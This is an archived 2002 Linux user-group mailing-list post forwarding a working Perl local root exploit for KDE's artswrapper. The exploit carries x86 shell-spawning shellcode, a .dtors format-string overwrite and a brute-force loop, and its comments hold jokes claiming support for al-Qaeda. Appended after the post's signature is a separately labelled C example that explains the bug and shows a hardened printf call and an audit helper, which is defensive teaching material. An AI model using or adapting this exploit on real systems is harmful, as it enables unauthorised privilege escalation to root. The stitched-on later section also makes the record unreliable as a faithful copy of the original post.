[bglug] Potential Local Root Exploit (Artswrapper)

embyte bglug@lists.linux.it
Mon, 8 Jul 2002 18:17:07 +0200


On Monday 08 July 2002 17:09, ./SuperbepS wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> http://dot.kde.org/1026105758/
>

http://online.securityfocus.com/archive/82/248221

<--- cut here -->

#!/usr/bin/perl

########################################################################
#
#        fartsy.pl by kanix <kanix@0xfee1dead.net>
#                /usr/sbin/artswrapper <local format string exploit>
#                        Tested on Red Hat Linux release 7.2 (Enigma)
#
#        Jul 6, 2002
#
#         "the secret to creativity is knowing how to hide your sources."
#                - Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
#        official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
#         security.is, #hackphreak, teleh0r (fame seeking whore like
#         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
#         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################

$kode =
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    = "/usr/bin/artswrapper";
$dtors   = 0x8049a7c + 4; # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/;
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    $tmp1  = (($ret_addr >> 16) & 0xffff);
    $tmp2  = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

<--cut here -->
-- 
      /"\       ASCII RIBBON CAMPAIGN
      \ /          AGAINST HTML MAIL
       X      BGLUG member @ bglug.linux.it
      / \     Rawlab member @ rawlab.cjb.net
      \ /      § embyte § ICQ UIN #48790142

 PGP KEY @ http://www.madlab.it/pgpkey/embyte.asc

"Video games don't influence children: in fact, if as kids we had been
brainwashed by Pac-Man, we would now spend our time in dimly lit rooms,
eating magic pills and listening to repetitive electronic music."
Kristian Wilson, Nintendo Inc, 1989
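The bug class behind the script forwarded above is a user-controlled string reaching printf() as the format, so that "%u%N$hn" pairs write to memory (the .dtors entry in this case). The following is an added example, not code from the mailing-list post nor from aRts/KDE: it shows the hardened calling pattern (constant format, untrusted string as data) and a hypothetical defender-side helper, `audit_untrusted_string`, that a wrapper or launcher could run on its arguments before logging them, reporting how many conversions a string contains and whether any of them is a %n-family write conversion. The function names and the sample string are my assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/*
 * Added example; not from the bglug post and not aRts/KDE code.
 * The vulnerable shape is an argument used directly as the format:
 *
 *     printf(msg);              // BUG: every '%' in msg is a directive
 *
 * "%n"-family directives then write the count of emitted characters to
 * an address taken from the stack, which is what the posted "%u%N$hn"
 * pairs rely on. The fix is to never let untrusted data be the format.
 */

/* Hardened form: constant format, untrusted string passed as data.
 * Returns printf's own return value (characters written). */
int print_message_safe(const char *msg)
{
    return printf("%s\n", msg);
}

/* Result of auditing a string that must never be used as a format. */
struct fmt_audit {
    int  directives;  /* '%' conversions found, "%%" excluded */
    bool has_write;   /* a %n / %hn / %ln write conversion is present */
};

/* Hypothetical trust-boundary check (name is an assumption): scan an
 * untrusted string for printf conversions, skipping flags, width,
 * precision, the POSIX "N$" positional marker and length modifiers
 * before reading the conversion character. */
struct fmt_audit audit_untrusted_string(const char *s)
{
    struct fmt_audit a = {0, false};
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {         /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        a.directives++;
        p++;
        /* flags, digits, '.', '$' and length modifiers */
        while (*p != '\0' && strchr("0123456789.$-+ #'hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0')
            break;                 /* truncated directive at end of string */
        if (*p == 'n')
            a.has_write = true;
    }
    return a;
}

int main(void)
{
    /* Constructed sample in the shape the posted script builds:
     * two 4-byte addresses, then "%<width>u%<pos>$hn" twice. */
    const char *sample = "AAAABBBB%8u%7$hn%9u%8$hn";
    struct fmt_audit a = audit_untrusted_string(sample);

    printf("directives=%d write_conversion=%s\n",
           a.directives, a.has_write ? "yes" : "no");
    print_message_safe(sample);    /* printed verbatim, never interpreted */
    return 0;
}
```

The helper is a reporting aid, not a substitute for the fix: the only reliable mitigation is a constant format string at every printf-family call. Modern toolchains flag the vulnerable shape at build time (gcc's `-Wformat -Wformat-security` warns on a non-literal format with no arguments), and glibc built with `_FORTIFY_SOURCE=2` aborts on a %n conversion found in a format string that lives in writable memory; neither existed on the Red Hat 7.2 target named in the post.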